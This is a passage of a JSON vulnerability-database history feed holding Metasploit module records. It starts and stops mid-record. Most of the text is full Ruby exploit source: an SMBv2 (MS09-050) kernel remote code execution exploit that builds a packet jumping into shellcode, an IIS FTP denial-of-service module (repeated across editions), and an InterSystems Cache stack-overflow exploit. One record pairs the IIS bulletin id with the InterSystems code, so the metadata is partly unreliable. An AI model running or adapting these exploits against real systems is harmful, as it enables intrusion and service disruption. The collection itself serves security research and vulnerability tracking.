code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.\n },\n\n 'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm', 'sf' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'MSB', 'MS09-050' ],\n [ 'CVE', '2009-3103' ],\n [ 'BID', '36299' ],\n [ 'OSVDB', '57799' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2009/Sep/0039.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'StackAdjustment' => -3500,\n 'DisableNops' => true,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n 'ExtendedOptions' =>\n {\n 'Stager' => 'stager_sysenter_hook',\n }\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Vista SP1/SP2 and Server 2008 (x86)',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86 ],\n 'Ret' => 0xFFD00D09, # \"POP ESI; RET\" from the kernels HAL memory region ...no ASLR :)\n 'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).\n 'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer\n 'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 07 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptInt.new( 'WAIT', [ true, \"The number of seconds to wait for the attack to complete.\", 180 ] )\n ])\n end\n\n # Not reliable enough for automation yet\n def autofilter\n false\n end\n\n def exploit\n print_status( \"Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})...\" )\n connect\n\n # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest\n # and srv2!SrvProcPartialCompleteCompoundedRequest\n dialects = [ [ target['ReadAddress'] ].pack(\"V\") * 25, \"SMB 2.002\" ]\n\n data = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('')\n data += [ 0x00000000 ].pack(\"V\") * 37 # Must be NULL's\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)\n data += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34\n data += [ 0x42424242 ].pack(\"V\") * 7 # Unused\n data += [ target['MagicIndex'] ].pack(\"V\") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)\n data += [ 0x41414141 ].pack(\"V\") * 6 # Unused\n data += [ target.ret ].pack(\"V\") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2\n data += payload.encoded # Our ring0 -> ring3 shellcode\n\n # We gain code execution by returning into the SMB packet, begining with its header.\n # The SMB packets Magic Header value is 0xFF534D42 which assembles to \"CALL DWORD PTR [EBX+0x4D]; INC EDX\"\n # This will cause an access violation if executed as we can never set EBX to a valid pointer.\n # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.\n # This assembles to \"ADD BYTE PTR [EBP+ECX*2+0x42], DL\" which is fine as ECX will be zero and EBP is a vaild pointer.\n # We patch the Signature1 value to be a jump forward into our shellcode.\n packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct\n packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE\n packet['Payload']['SMB'].v['Flags1'] = 0x18\n packet['Payload']['SMB'].v['Flags2'] = 0xC853\n packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']\n packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # \"JMP DWORD 0x15D\" ; jump into our ring0 payload.\n packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...\n packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )\n packet['Payload'].v['Payload'] = data\n\n packet = packet.to_s\n\n print_status( \"Sending the exploit packet (#{packet.length} bytes)...\" )\n sock.put( packet )\n\n\n wtime = datastore['WAIT'].to_i\n print_status( \"Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger...\" )\n stime = Time.now.to_i\n\n\n poke_logins = %W{Guest Administrator}\n poke_logins.each do |login|\n begin\n sec = connect(false)\n sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))\n rescue ::Exception => e\n sec.socket.close\n end\n end\n\n while( stime + wtime > Time.now.to_i )\n select(nil, nil, nil, 0.25)\n break if session_created?\n end\n\n handler\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-18T20:40:44", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 70}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-06-19T03:00:17", "history": [], "viewCount": 117, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-06-19T03:00:17"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-06-19T03:00:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-19T03:00:17", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 71}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "4f7f001ed69ab56a53fa190454e27f76", "type": "metasploit", "bulletinFamily": "exploit", "title": "InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow", "description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code.\n", "published": "2009-11-28T15:26:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-22T00:28:50", "history": [], "viewCount": 117, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-06-22T00:28:50"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1109254743703769798", "KITPLOIT:322408086970758806"]}, {"type": "threatpost", "idList": ["THREATPOST:2DDB1918554F258230A7F9D56F220D8F", "THREATPOST:A02178C7680BBF92849A8E5B4ACDD06A", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:C10858B87DF78B25FE56F160396FA6D8", "THREATPOST:940D25B2411A9F488AC444771FDD1304"]}, {"type": "thn", "idList": ["THN:D4CF405E96E0712654FF2AD7347571B1", "THN:35E9D75A3F6252B550F37910B4C0335A", "THN:3740262E7693548F88688CB1EEDC492A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1D06BFD312BC44ABE7F47110F4BFA29C", "TALOSBLOG:688BE6618140B4A2CFD5100D561798BE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141281", "OPENVAS:1361412562310140837"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994644"]}, {"type": "exploitdb", "idList": ["EDB-ID:47019"]}, {"type": "cve", "idList": ["CVE-2019-8458", "CVE-2019-8459", "CVE-2019-1869"]}, {"type": "mssecure", "idList": ["MSSECURE:156FF070BDAB2C319E2B1C982DDF3043"]}], "modified": "2019-06-22T00:28:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/intersystems_cache.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n # XXX: Needs custom body check HttpFingerprint = { :uri => '/csp/sys/mgr/UtilConfigHome.csp', :body => [ /Cache for Windows/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '60549' ],\n [ 'BID', '37177' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 650,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x0c\\x25\\x23\\x20\\x0a\\x0d\\x09\\x2f\\x2b\\x2e\\x0b\\x5c\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 SP4 English', { 'Offset' => 710, 'Ret' => 0x6ff2791a } ], # libhttpd.dll 2.2.11.0 / pop ebp | pop ebx | ret\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 29 2009')) # Initially...!\n\n register_options( [ Opt::RPORT(57772) ])\n end\n\n def exploit\n # offset to the seh frame.\n sploit = payload.encoded + rand_text_alpha_upper(target['Offset'] - payload.encoded.length)\n # jmp $+6 | p/p/r\n sploit << Rex::Arch::X86.jmp_short(6) + [target.ret].pack('V')\n # fall into some nops, jmp back to our final payload.\n sploit << make_nops(8) + [0xe9, -700].pack('CV')\n # cause the av!\n sploit << rand_text_alpha_upper(payload.encoded.length)\n\n print_status(\"Trying target #{target.name}...\")\n\n send_request_raw({\n 'uri' => '/csp/sys/mgr/UtilConfigHome.csp=' + sploit,\n 'method' => 'GET',\n }, 5)\n\n handler\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-22T00:28:50", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 72}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-06-22T08:30:36", "history": [], "viewCount": 120, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-06-22T08:30:36"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-06-22T08:30:36"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-22T08:30:36", "differentElements": ["sourceData"], "edition": 73}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-06T10:03:27", "history": [], "viewCount": 120, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2019-07-06T10:03:27"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-06T10:03:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-06T10:03:27", "differentElements": ["sourceData"], "edition": 74}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-06T13:42:25", "history": [], "viewCount": 121, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-06T13:42:25"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-06T13:42:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-06T13:42:25", "differentElements": ["sourceData"], "edition": 75}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-13T16:28:21", "history": [], "viewCount": 121, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-06T13:42:25"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-06T13:42:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-13T16:28:21", "differentElements": ["sourceData"], "edition": 76}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": 